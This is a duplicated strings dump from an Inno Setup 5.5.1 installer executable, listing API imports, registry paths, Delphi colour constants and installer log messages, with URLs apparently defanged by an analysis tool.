function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
procedure RaiseException(const Msg: String);
function SetSetupPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetSetupPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Uh.QP
Uh.QP
IMsgt
IMsgt
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
MSGBOX
INIKEYEXISTS
INIKEYEXISTS
GETCMDTAIL
GETCMDTAIL
REGKEYEXISTS
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
REGGETSUBKEYNAMES
MSGBOXEX
MSGBOXEX
SETPASSWORD
SETPASSWORD
CHECKFORMUTEXES
CHECKFORMUTEXES
SHELLEXEC
SHELLEXEC
SHELLEXECASORIGINALUSER
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
EXITSETUPMSGBOX
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
GETWINDOWSVERSIONSTRING
SUPPRESSIBLEMSGBOX
SUPPRESSIBLEMSGBOX
GetWindowsVersionEx
GetWindowsVersionEx
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
AutoHotkeys
AutoHotkeys
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Setup Data (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
Inno Setup Messages (5.5.0) (u)
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
kernel32.dll
kernel32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyW
LoadKeyboardLayoutW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextW
GetKeyNameTextW
ExitWindowsEx
ExitWindowsEx
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
version.dll
version.dll
mpr.dll
mpr.dll
TransactNamedPipe
TransactNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
CreateNamedPipeW
CreateNamedPipeW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegFlushKey
RegFlushKey
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExW
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
winspool.drv
winspool.drv
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
ShellExecuteW
ShellExecuteW
comdlg32.dll
comdlg32.dll
`.rdata
`.rdata
@.data
@.data
.pdata
.pdata
COMCTL32.dll
COMCTL32.dll
SHLWAPI.dll
SHLWAPI.dll
SetProcessShutdownParameters
SetProcessShutdownParameters
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
OLEAUT32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
KWindows
KWindows
UrlMon
UrlMon
6MsgIDs
6MsgIDs
Msgs
Msgs
pIPEdit
pIPEdit
.rsrc
.rsrc
@.reloc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
shlwapi.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
RegKey
GetWindowsDirectoryA
GetWindowsDirectoryA
RegOpenKeyA
RegOpenKeyA
RegCreateKeyExA
RegCreateKeyExA
SHFOLDER.dll
SHFOLDER.dll
dll\shfolder.dbg
dll\shfolder.dbg
Font.Charset
Font.Charset
Font.Color
Font.Color
Font.Height
Font.Height
Font.Name
Font.Name
Font.Style
Font.Style
Lines.Strings
Lines.Strings
name="JR.Inno.Setup"
name="JR.Inno.Setup"
version="1.0.0.0"
version="1.0.0.0"
true
true
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
%s[%d]
%s[%d]
%s_%d
%s_%d
.Owner
.Owner
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
USER32.DLL
USER32.DLL
uxtheme.dll
uxtheme.dll
DWMAPI.DLL
DWMAPI.DLL
clWebSnow
clWebSnow
clWebFloralWhite
clWebFloralWhite
clWebLavenderBlush
clWebLavenderBlush
clWebOldLace
clWebOldLace
clWebIvory
clWebIvory
clWebCornSilk
clWebCornSilk
clWebBeige
clWebBeige
clWebAntiqueWhite
clWebAntiqueWhite
clWebWheat
clWebWheat
clWebAliceBlue
clWebAliceBlue
clWebGhostWhite
clWebGhostWhite
clWebLavender
clWebLavender
clWebSeashell
clWebSeashell
clWebLightYellow
clWebLightYellow
clWebPapayaWhip
clWebPapayaWhip
clWebNavajoWhite
clWebNavajoWhite
clWebMoccasin
clWebMoccasin
clWebBurlywood
clWebBurlywood
clWebAzure
clWebAzure
clWebMintcream
clWebMintcream
clWebHoneydew
clWebHoneydew
clWebLinen
clWebLinen
clWebLemonChiffon
clWebLemonChiffon
clWebBlanchedAlmond
clWebBlanchedAlmond
clWebBisque
clWebBisque
clWebPeachPuff
clWebPeachPuff
clWebTan
clWebTan
clWebYellow
clWebYellow
clWebDarkOrange
clWebDarkOrange
clWebRed
clWebRed
clWebDarkRed
clWebDarkRed
clWebMaroon
clWebMaroon
clWebIndianRed
clWebIndianRed
clWebSalmon
clWebSalmon
clWebCoral
clWebCoral
clWebGold
clWebGold
clWebTomato
clWebTomato
clWebCrimson
clWebCrimson
clWebBrown
clWebBrown
clWebChocolate
clWebChocolate
clWebSandyBrown
clWebSandyBrown
clWebLightSalmon
clWebLightSalmon
clWebLightCoral
clWebLightCoral
clWebOrange
clWebOrange
clWebOrangeRed
clWebOrangeRed
clWebFirebrick
clWebFirebrick
clWebSaddleBrown
clWebSaddleBrown
clWebSienna
clWebSienna
clWebPeru
clWebPeru
clWebDarkSalmon
clWebDarkSalmon
clWebRosyBrown
clWebRosyBrown
clWebPaleGoldenrod
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebLightGoldenrodYellow
clWebOlive
clWebOlive
clWebForestGreen
clWebForestGreen
clWebGreenYellow
clWebGreenYellow
clWebChartreuse
clWebChartreuse
clWebLightGreen
clWebLightGreen
clWebAquamarine
clWebAquamarine
clWebSeaGreen
clWebSeaGreen
clWebGoldenRod
clWebGoldenRod
clWebKhaki
clWebKhaki
clWebOliveDrab
clWebOliveDrab
clWebGreen
clWebGreen
clWebYellowGreen
clWebYellowGreen
clWebLawnGreen
clWebLawnGreen
clWebPaleGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumAquamarine
clWebMediumSeaGreen
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkOliveGreen
clWebDarkgreen
clWebDarkgreen
clWebLimeGreen
clWebLimeGreen
clWebLime
clWebLime
clWebSpringGreen
clWebSpringGreen
clWebMediumSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebPaleTurquoise
clWebLightCyan
clWebLightCyan
clWebLightBlue
clWebLightBlue
clWebLightSkyBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebDarkBlue
clWebIndigo
clWebIndigo
clWebMediumTurquoise
clWebMediumTurquoise
clWebTurquoise
clWebTurquoise
clWebCyan
clWebCyan
clWebPowderBlue
clWebPowderBlue
clWebSkyBlue
clWebSkyBlue
clWebRoyalBlue
clWebRoyalBlue
clWebMediumBlue
clWebMediumBlue
clWebMidnightBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebDarkTurquoise
clWebCadetBlue
clWebCadetBlue
clWebDarkCyan
clWebDarkCyan
clWebTeal
clWebTeal
clWebDeepskyBlue
clWebDeepskyBlue
clWebDodgerBlue
clWebDodgerBlue
clWebBlue
clWebBlue
clWebNavy
clWebNavy
clWebDarkViolet
clWebDarkViolet
clWebDarkOrchid
clWebDarkOrchid
clWebMagenta
clWebMagenta
clWebDarkMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebMediumVioletRed
clWebPaleVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebBlueViolet
clWebMediumOrchid
clWebMediumOrchid
clWebMediumPurple
clWebMediumPurple
clWebPurple
clWebPurple
clWebDeepPink
clWebDeepPink
clWebLightPink
clWebLightPink
clWebViolet
clWebViolet
clWebOrchid
clWebOrchid
clWebPlum
clWebPlum
clWebThistle
clWebThistle
clWebHotPink
clWebHotPink
clWebPink
clWebPink
clWebLightSteelBlue
clWebLightSteelBlue
clWebMediumSlateBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebLightSlateGray
clWebWhite
clWebWhite
clWebLightgrey
clWebLightgrey
clWebGray
clWebGray
clWebSteelBlue
clWebSteelBlue
clWebSlateBlue
clWebSlateBlue
clWebSlateGray
clWebSlateGray
clWebWhiteSmoke
clWebWhiteSmoke
clWebSilver
clWebSilver
clWebDimGray
clWebDimGray
clWebMistyRose
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlateBlue
clWebDarkSlategray
clWebDarkSlategray
clWebGainsboro
clWebGainsboro
clWebDarkGray
clWebDarkGray
clWebBlack
clWebBlack
msctls_hotkey32
msctls_hotkey32
Items.ItemData
Items.ItemData
RegDeleteKeyExW
RegDeleteKeyExW
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
%s, ClassID: %s
%s, ClassID: %s
%s, ProgID: "%s"
%s, ProgID: "%s"
oleacc.dll
oleacc.dll
MSFTEDIT.DLL
MSFTEDIT.DLL
RICHED20.DLL
RICHED20.DLL
File I/O error %d
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
Rstrtmgr.dll
Rstrtmgr.dll
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
WININIT.INI
WININIT.INI
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegCreateKeyEx
RegOpenKeyEx
RegOpenKeyEx
sfc.dll
sfc.dll
cmd.exe" /C "
cmd.exe" /C "
COMMAND.COM" /C
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations
PendingFileRenameOperations2
PendingFileRenameOperations2
@Software\Microsoft\Windows\CurrentVersion\Fonts
@Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
OLEAUT32.DLL
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
%s Log %s #%.3u.txt
regsvr32.exe"
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
CreateNamedPipe
helper %d 0x%x
helper %d 0x%x
Helper process PID: %u
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
Helper process exited with failure code: 0x%x
TransactNamedPipe/GetOverlappedResult
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
v1.1.4322
.NET Framework version %s not found
.NET Framework version %s not found
Fusion.dll
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
MoveFileEx failed (%d).
Deleting directory: %s
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Failed to delete directory (%d).
Deleting file: %s
Deleting file: %s
Failed to delete the file; it may be in use (%d).
Failed to delete the file; it may be in use (%d).
The file appears to be in use (%d). Will delete on restart.
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec filename:
Running Exec parameters:
Running Exec parameters:
CreateProcess failed (%d).
CreateProcess failed (%d).
Process exit code: %u
Process exit code: %u
Running ShellExec filename:
Running ShellExec filename:
Running ShellExec parameters:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
Unregistering font: %s
zlib: Internal error. Code %d
zlib: Internal error. Code %d
bzlib: Internal error. Code %d
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
DecodeToBuf failed (%d)
c:\directory
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Could not find page with ID %d
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
%s\%s_is1
RestartManager found an application using one of our files: %s
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
Can use RestartManager to avoid reboot? %s (%d)
PrepareToInstall failed: %s
PrepareToInstall failed: %s
Need to restart Windows? %s
Need to restart Windows? %s
/:*?"|
/:*?"|
\/:*?"|
\/:*?"|
%s-%d.bin
%s-%d.bin
%s-%d%s.bin
%s-%d%s.bin
..\DISK%d\
..\DISK%d\
Asking user for new disk containing "%s".
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.1.ee2 (u)
5.5.1.ee2 (u)
URLInfoAbout
URLInfoAbout
URLUpdateInfo
URLUpdateInfo
Creating directory: %s
Creating directory: %s
Setting permissions on directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
Failed to set NTFS compression state (%d).
Failed to set value in Fonts registry key.
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Setting permissions on file: %s
Failed to set permissions on file (%d).
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Dest filename: %s
Dest filename: %s
Dest file is protected by Windows File Protection.
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of our file: %s
Time stamp of existing file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
desktop.ini
.ShellClassInfo
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
target.lnk
Filename: %s
Filename: %s
Desktop.ini
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFileEx: The file "%s" was not found
ExtractTemporaryFileEx: The file "%s" was not found
ExtractTemporaryFileToStream: The file "%s" was not found
ExtractTemporaryFileToStream: The file "%s" was not found
ExtractTemporaryFileSize: The file "%s" was not found
ExtractTemporaryFileSize: The file "%s" was not found
ExtractTemporaryFileToBuffer: The file "%s" was not found
ExtractTemporaryFileToBuffer: The file "%s" was not found
Invalid symbol '%s' found
Invalid symbol '%s' found
Invalid token '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx
ShellExecuteEx returned hProcess=0
ShellExecuteEx returned hProcess=0
Wnd=$%x
Wnd=$%x
Expression error '%s'
Expression error '%s'
srcexe
srcexe
Cannot evaluate "%s" constant during Uninstall
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
Unknown custom message name "%s" in "cm" constant
Cannot expand "pf64" constant on this version of Windows
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
cmd.exe
COMMAND.COM
COMMAND.COM
\_setup64.tmp
\_setup64.tmp
_isetup\_shfoldr.dll
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
shfolder.dll
Failed to load DLL "%s"
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
64-bit Windows: %s
Processor architecture: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Defaulting to %s for suppressed message box (%s):
Message box (%s):
Message box (%s):
User chose %s.
User chose %s.
MsgBox failed.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
64-bit install mode: %s
%d.%d
%d.%d
_isetup\_isdecmp.dll
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
_isetup\_iscrypt.dll
/Password=
/Password=
/SuppressMsgBoxes
/SuppressMsgBoxes
/DETACHEDMSG
/DETACHEDMSG
-0.bin
-0.bin
Setup version: Inno Setup version 5.5.1.ee2 (u)
Setup version: Inno Setup version 5.5.1.ee2 (u)
Original Setup EXE:
Original Setup EXE:
Windows NT
Windows NT
Not restarting Windows because Setup is being run from the debugger.
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Restarting Windows.
Inno Setup version 5.5.1.ee2 (u)
Inno Setup version 5.5.1.ee2 (u)
Portions Copyright (C) 2000-2012 Martijn Laan
Portions Copyright (C) 2000-2012 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
hXXp://VVV.remobjects.com/ps
hXXp://restools.hanzify.org/
hXXp://restools.hanzify.org/
Cannot run files in 64-bit locations on this version of Windows
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: Exec
Type: ShellExec
Type: ShellExec
RmRestart returned an error: %d
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
Will not restart Windows automatically.
RegDeleteKeyExA
RegDeleteKeyExA
System\CurrentControlSet\Control\Windows
System\CurrentControlSet\Control\Windows
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Date exceeds maximum of %s
Date exceeds maximum of %s
Date is less than minimum of %s
Date is less than minimum of %s
System Error. Code: %d.
System Error. Code: %d.
Remove shared file %s? User chose %s%s
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
Not restarting Windows because Uninstall is being run from the debugger.
Cannot call "%s" function during Setup
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Cannot call "%s" function during Uninstall
Invalid RootKey value
Invalid RootKey value
Unknown custom message name "%s"
Unknown custom message name "%s"
%u.%.2u.%u
%u.%.2u.%u
%u.%u.%u.%u
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
Cannot disable FS redirection on this version of Windows
Runtime Error (at %d:%d):
Runtime Error (at %d:%d):
Exception "%s" at address %p
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
TScriptRunner.LoadScript failed
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
isRS-???.tmp
isRS-???.tmp
isRS-%.3u.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
DisableProcessWindowsGhosting
Interface not supported
Interface not supported
7Dispatch methods do not support more than 64 parameters
7Dispatch methods do not support more than 64 parameters
Exception: %s
Exception: %s
Cannot Import %s
Cannot Import %s
Out Of Stack Range Failed to get object at index %d"Failed to set tab "%s" at index %d Failed to set object at index %d
Out Of Stack Range Failed to get object at index %d"Failed to set tab "%s" at index %d Failed to set object at index %d
Invalid item level assignment Invalid level (%d) for item "%s"
Invalid item level assignment Invalid level (%d) for item "%s"
Invalid owner %s is already associated with %sE%d is an invalid PageIndex value. PageIndex must be between 0 and %d=This control requires version 4.70 or greater of COMCTL32.DLL
Invalid owner %s is already associated with %sE%d is an invalid PageIndex value. PageIndex must be between 0 and %d=This control requires version 4.70 or greater of COMCTL32.DLL
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
LError loading dock zone from the stream. Expecting version %d, but found %d.,Multiselect mode must be on for this feature
LError loading dock zone from the stream. Expecting version %d, but found %d.,Multiselect mode must be on for this feature
